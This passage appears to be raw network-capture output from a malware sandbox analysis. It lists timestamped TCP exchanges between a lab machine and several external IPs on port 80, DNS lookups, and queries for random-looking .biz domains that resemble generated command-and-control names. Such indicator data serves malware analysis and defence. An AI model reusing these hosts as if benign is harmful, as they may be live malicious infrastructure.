                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.024456024 CET804996118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.679272890 CET804996118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.679438114 CET4996180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.687042952 CET804996118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.687119961 CET4996180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.697032928 CET4996480192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.704041958 CET804996418.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.704103947 CET4996480192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.704221964 CET4996480192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.704242945 CET4996480192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.709505081 CET804996418.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.712212086 CET804996418.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.556171894 CET804996418.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.560772896 CET4996480192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.567116976 CET804996418.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.567168951 CET4996480192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.677721024 CET4996980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.683224916 CET804996944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.683300972 CET4996980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.685003042 CET4996980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.685168982 CET4996980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.690416098 CET804996944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.690450907 CET804996944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:33.342528105 CET4996980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:33.350625038 CET4997580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:33.355983973 CET804997544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:33.359250069 CET4997580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:33.359962940 CET4997580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:33.360002041 CET4997580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:33.365315914 CET804997544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:33.365343094 CET804997544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.013256073 CET804997544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.014231920 CET4997580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.020335913 CET804997544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.021488905 CET4997580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.229958057 CET4998180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.235421896 CET804998154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.236316919 CET4998180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.236495018 CET4998180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.236495018 CET4998180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.241954088 CET804998154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.241964102 CET804998154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.165713072 CET805002935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.165937901 CET5002980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.166544914 CET805002935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.166557074 CET805002935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.166599035 CET5002980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.172363043 CET805002935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.179622889 CET5003280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.185269117 CET805003218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.185375929 CET5003280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.185539961 CET5003280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.185564995 CET5003280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.190885067 CET805003218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.191600084 CET805003218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.623069048 CET805003218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.623265028 CET5003280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.628973007 CET805003218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.629050016 CET5003280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.638452053 CET4976880192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.638736963 CET5004180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.644017935 CET8050041208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.644129038 CET8049768208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.644155979 CET5004180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.644195080 CET4976880192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.644360065 CET5004180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.644376040 CET5004180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.649609089 CET8050041208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.649619102 CET8050041208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.338663101 CET8050041208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.342329979 CET5004180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.342377901 CET5004180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.347824097 CET8050041208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.347843885 CET8050041208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.486805916 CET8050041208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.502119064 CET5005280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.508348942 CET805005244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.508445978 CET5005280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.508557081 CET5005280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.508579969 CET5005280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.514636993 CET805005244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.514647961 CET805005244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.528333902 CET5004180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.453974009 CET805005244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.454550982 CET805005244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.454565048 CET805005244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.454638004 CET5005280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.454750061 CET5005280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.457695007 CET805005244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.460352898 CET805005244.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.460412025 CET5005280192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.471276999 CET5005780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.477550983 CET805005734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.481317997 CET5005780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.485996962 CET5005780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.486031055 CET5005780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.491355896 CET805005734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.491374969 CET805005734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.313765049 CET805005734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.313962936 CET5005780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.321028948 CET805005734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.321104050 CET5005780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.331468105 CET5006280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.337016106 CET805006218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.337100029 CET5006280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.278640032 CET5008780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.278656006 CET5008780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.284146070 CET805008772.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.284177065 CET805008772.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.961080074 CET805008772.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.961169004 CET5008780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.961287022 CET5008780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.963443995 CET5008880192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.966777086 CET805008772.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.969105005 CET805008872.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.969188929 CET5008880192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.969413042 CET5008880192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.969492912 CET5008880192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.974955082 CET805008872.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.974988937 CET805008872.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.684798956 CET805008872.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.684897900 CET5008880192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.684993982 CET5008880192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.690426111 CET805008872.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.701989889 CET5008980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.707467079 CET805008944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.707544088 CET5008980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.707676888 CET5008980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.707676888 CET5008980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.713041067 CET805008944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.713093042 CET805008944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.369520903 CET805008944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.369813919 CET5008980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.375643015 CET805008944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.375706911 CET5008980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.384251118 CET5009080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.389800072 CET805009018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.389890909 CET5009080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.389998913 CET5009080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.390033960 CET5009080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.395373106 CET805009018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.395427942 CET805009018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.845782042 CET805009018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.846437931 CET5009080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.852531910 CET805009018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.853084087 CET5009080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.861627102 CET5009180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.867089987 CET805009118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.867189884 CET5009180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.867338896 CET5009180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.867340088 CET5009180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.872701883 CET805009118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.873590946 CET805009118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:01.340914011 CET5009180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:01.344136000 CET5009280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:01.350424051 CET805009218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:01.350631952 CET5009280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:01.350792885 CET5009280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:01.350812912 CET5009280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:01.356204033 CET805009218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:01.356575012 CET805009218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.025896072 CET805009218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.026079893 CET5009280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.032074928 CET805009218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.032146931 CET5009280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.041990042 CET5009380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.047734022 CET8050093172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.050673008 CET5009380192.168.2.4172.234.222.138
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.879770994 CET6135253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.980597973 CET53613521.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.685522079 CET6540653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.693406105 CET53654061.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.693969011 CET6267453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.701518059 CET53626741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:02.747245073 CET5213353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:02.756433964 CET53521331.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.718594074 CET6335153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.726793051 CET53633511.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.506292105 CET5557153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.514970064 CET53555711.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.062402964 CET6308353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.073811054 CET53630831.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.364620924 CET6328953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.372435093 CET53632891.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.389167070 CET5972753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.397151947 CET53597271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.219027042 CET6412753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.226758003 CET53641271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:13.540184975 CET5358753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:13.550136089 CET53535871.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.740787983 CET5470453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.748645067 CET53547041.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.910320997 CET5578853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.919111013 CET53557881.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.102371931 CET5611353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.110955954 CET53561131.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.785486937 CET5582153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.793451071 CET53558211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.551800013 CET4988653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.560046911 CET53498861.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.201894999 CET5143353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.210469961 CET53514331.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.689502954 CET5974953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.785109043 CET53597491.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.475912094 CET5024553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.483997107 CET53502451.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.484841108 CET5012753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.493058920 CET53501271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.775547981 CET5271653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.785861969 CET53527161.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.776446104 CET6230653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.784235954 CET53623061.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.251075029 CET5101553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.260490894 CET53510151.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:30.811909914 CET5189353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.003324986 CET53518931.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.680924892 CET6516753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.691201925 CET53651671.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.565598011 CET5937553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.573965073 CET53593751.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.014976978 CET5774953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.199928045 CET53577491.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.101701975 CET5416353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.109776974 CET53541631.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.094786882 CET6048753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.102504015 CET53604871.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.805358887 CET5117753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.814157963 CET53511771.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.074923038 CET6292253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.082681894 CET53629221.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.557455063 CET4976653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.565340996 CET53497661.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.788281918 CET192.168.2.41.1.1.10x1b31Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:53.885560036 CET192.168.2.41.1.1.10x3632Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.189166069 CET192.168.2.41.1.1.10x3182Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
